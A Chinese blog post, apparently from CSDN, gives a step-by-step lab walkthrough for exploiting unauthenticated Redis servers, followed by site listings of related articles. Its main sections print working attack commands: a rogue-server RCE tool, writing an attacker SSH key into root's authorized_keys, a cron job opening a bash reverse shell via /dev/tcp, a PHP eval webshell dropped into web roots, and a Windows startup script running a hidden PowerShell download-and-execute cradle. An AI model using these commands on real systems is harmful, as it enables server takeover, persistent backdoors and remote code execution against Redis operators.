启动redis shell_一篇了解 Redis 未授权漏洞利用

最新推荐文章于 2023-06-26 20:13:29 发布
最新推荐文章于 2023-06-26 20:13:29 发布
阅读量1.3k 收藏
点赞数
文章标签: 启动redis shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33168127/article/details/113536857
版权

oxo1 前言

闲来没事来学一下 Redis 未授权吧、顺路写一篇公众号文章。不是原创、只是东搜西搜拼成一篇文章而已。作为脚本小子就不写什么原理了、因为也不懂。想知道原理的可以谷歌搜索学习吧。

oxo2 环境

  • Kali linux + Redis 4.x

  • Centos 7 + Redis 5.x

  • Win7 + Redis

oxo3 配置

修改 redis.conf (redis.windows.conf)配置文件

bind 127.0.0.1protected-mode yes

改成下方内容就可以未授权访问了

# bind 127.0.0.1protected-mode no
oxo4 RCE

本地测试的版本:4.x  + 5.x

利用工具:https://github.com/n0b0dyCN/redis-rogue-server

下载、安装、利用、一波操作。

git clone https://github.com/n0b0dyCN/redis-rogue-server.gitcd redis-rogue-server/RedisModulesSDK/expmakecd ../../python3 redis-rogue-server.py --rhost 192.168.237.130 --lhost 192.168.237.129

输入 i 得到一个交互式 Shell、可以直接输入命令

cf731e077774affe5683f2cefc49892d.png

输入 r 可以反弹 Shell

a747c8fc1e44f37b46825d380b85e4f7.png

得到 Shell

56e1eaac0b9700c10ea92d5e53de941f.png

录了一个渣渣视频到B站:https://www.bilibili.com/video/av70445399

oxo5 SSH

Kali 本地生成 ssh key

ssh-keygen -t rsa

6f98ab08df3249e30862f72d4db4ff55.png

进入 .ssh 目录把公钥写入到 ssh.txt 文件中

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txt

97ec3ea90219e8ec5f21717cdb22cae5.png

把 ssh.txt 复制到 redis 启动的目录、然后写入

cat ssh.txt | ./redis-cli -h 192.168.237.130 -x set ssh_key./redis-cli -h 192.168.237.130config set dir /root/.ssh/config set dbfilename authorized_keyssave

5e5d0422d57e82b74261a699b6581912.png

然后就可以连接了、第一次连接的时候需要输入 yes

ssh -i id_rsa root@192.168.237.130

b9f9fd3d952938069c74129d6a5fbba3.png

录了一个渣渣视频到B站:https://www.bilibili.com/video/av70381805/

oxo6 定时任务反弹Shell

连接、写入反弹Shell命令、得到Shell

./redis-cli -h 192.168.237.130config set dir /var/spool/cron/config set dbfilename rootset x "\n\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.237.1/888 0>&1\n\n\n"save

c73f63babf91064ad99f60494870ac75.png

得到 Shell

6a277823b8cb009658d39db3bf4f6ed4.png

录了一个渣渣视频到B站:https://www.bilibili.com/video/av70380577/

oxo7 Linux写入Webshell

连接、写入Webshell、菜刀连之

./redis-cli -h 192.168.237.130config set dir /var/www/html/config set dbfilename shell.phpset x "<?php @eval($_POST[1]);?>"save

75a3e53854da649c1ec48dbaeea1cdd9.png

菜刀连之

ee5956c0914a8abdb4022f527919961e.png

录了一个渣渣视频到B站:https://www.bilibili.com/video/av70377553/

oxo8 自启动写入后门

CS生成后门、连接Redis、写入自启动、重启Win7、成功上线

b83f39a0352b454b15bedd0b29ff83da.png

./redis-cli -h 192.168.237.128config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"config set dbfilename 1.batset x "\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.237.129:80/a'))\"\r\n\r\n"save

f3809fa345bd1caf2f2a17e93010aa13.png

手动重启靶机、成功上线

2de61f5ae8508d049a1dc13f652c2da9.png

录了一个渣渣视频到B站:https://www.bilibili.com/video/av70375932/

oxo9 Windows写入Webshell

连接、写入Webshell、菜刀连之

./redis-cli -h 192.168.237.128config set dir c:/phpstudy/wwwconfig set dbfilename shell.phpset shell "<?php @eval($_POST[1]);?>"save

560f5ad020c51b2269a11f58c0679271.png

菜刀连之

4b5854f64d25d70db3267c6459157d78.png

录了一个渣渣视频到B站:https://www.bilibili.com/video/av70373023/

ox10 文末

利用方法简单、没什么麻烦的操作。每个操作步骤我还录了几个渣渣视频、脚本小子能做的只有这么多了。

ox11 参考

https://github.com/n0b0dyCN/redis-rogue-server

https://zhuanlan.zhihu.com/p/79808540

https://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

https://zhuanlan.zhihu.com/p/25015624

https://www.leavesongs.com/PENETRATION/write-webshell-via-redis-server.html

0a5e739275273287185a844f710311e6.png

艾德琳的金鱼记忆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【Rides】使用Xshell 链接云服务器安装Rides及其三种启动方法详解
一键难忘的博客
03-05 798
键值(key-value)型,value 支持多种不同数据结构,功能丰富单线程,每个命令具备原子性低延迟,速度快(基于内存、O 多路复用、良好的编码)。支持数据持久化支持主从集群、分片集群支持多语言客户端。
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
一键启停Redis:Linux系统下的自动化脚本秘籍
我先测了
03-16 9327
在Linux系统中,Redis服务的启动和停止通常需要手动输入命令。为了提高效率,我们可以通过编写一个shell脚本来实现一键启停Redis服务。
Redis 的 详细Shell命令
First_llh的博客
12-22 2179
redis命令redis-cli --raw设置中文乱码) 设置 (重复覆盖) set key value 获取 get key 删除 del key 查询所有的key keys* 返回序列化的值 dump key 查询是否存在 exists key 选择数据库(默认第0个) select 索引 清空当前数据库 flushdb 清空所有的数据库 flushall 查看数据的类型 type key 给key设置10秒的过期时间..
Redis授权访问漏洞复现(www.hetianlab.com)
懂进攻知防守
07-19 1125
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
Redis授权访问漏洞的利用姿势
chengman3837的博客
12-30 365
本文来自:i春秋社区 0x01 Redis简介 redis是一个key-value型数据库,信息以键对应值的关系存储在内存中,当然可以把其存储至硬盘上。项目中使用redis做任务队列的存储器可以很容易实现分布式,另外也开始流行使用redis作为session的存储器来替换传统的文件方式。在...
关于Redis授权访问漏洞利用的介绍与修复建议
09-09
然而,Redis的一个常见安全问题在于其默认配置可能导致授权访问漏洞,这允许任何能够访问服务器的用户无需认证即可读取或篡改Redis数据。 **一、漏洞介绍** 默认情况下,Redis绑定在0.0.0.0:6379,这意味着它...
2-redisshell_redis_
10-03
文件`01_Redis3集群安装.docx`可能包含详细的集群搭建指南。一般来说,Redis集群需要至少三个节点,通过`redis-trib.rb`工具创建并管理。每个节点都需要配置集群模式,并指定其他节点的IP和端口。 对于Linux系统的...
Redis授权访问漏洞复现与利用
bylfsj的博客
03-21 2313
一、漏洞简介以及危害: 1.什么是redis授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访...
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3443
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
Redis 漏洞总结
最新发布
qq_41696518的博客
06-26 3061
其实漏洞的原理无外乎就2点:1. 能连接Redis,这是利用的前提。2. linux一切皆文件,要利用的服务可通过修改文件内容达成。
攻防_漏洞_Redis授权
redglare的博客
01-11 1889
原文链接:http://www.cnblogs.com/bmjoker/p/9548962.html 一、漏洞简介以及危害: 1.什么是redis授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在
redis便捷启动,shell启动redis
qq_41633199的博客
06-02 716
单纯通过./bin/redis-server ./redis.conf 命令启动redis,退出命令行后会退出shutdown redis,通过修改redis.conf文件可以做到redis后台运行。 1:修改redis.conf文件,将daemonize设置为yes使得redis作为守护程序启动: 2:默认情况下redis有16个库,考虑到redis是单线程模式运行,我在redis.conf中将redis库设置为2个。 3:同样的,redis安装后是没有密码的,这里我在redis.conf
shell脚本如何运行redis命令
热门推荐
李少辉的专栏
03-24 1万+
shell
51单片机中0x01是什么?
Chaosna13的博客
01-21 7555
相信不少初学51单片机的同学都有类似的疑惑。其实不能理解 0x代表16进制,展开来就是 0000,0001 希望可以帮助到您
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1918
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis的三种启动方式
futeng
05-26 1697
Part I. 直接启动 下载 官网下载     安装   tar zxvf redis-2.8.9.tar.gz cd redis-2.8.9 #直接make 编译 make #可使用root用户执行`make install`,将可执行文件拷贝到/usr/local/bin目录下。这样就可以直接敲名字运行程序了。 make install   启动   #加...
Linux之的Shell脚本编写启动Redis服务
Seven71111的博客
05-06 1463
我的redis: 服务路径:/usr/local/redis/bin/redis-server 配置文件路径:/usr/local/redis/bin/redis.conf 1、先创建一个文件vim redis.sh 2、然后是编写shell srcipt,保存退出 3、增加脚本可执行权限, chmod +x redis.sh 4、最后是执行sh脚本,./redis.sh start ...
常见IT系统授权漏洞风险与Redis示例
本文主要探讨了多个常见的授权访问漏洞,涉及的IT服务和组件包括Redis、MongoDB、Jenkins、Memcached、JBOSS、VNC、Docker、ZooKeeper、Rsync、Atlassian Crowd、CouchDB、Elasticsearch和Hadoop。这些漏洞的共同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值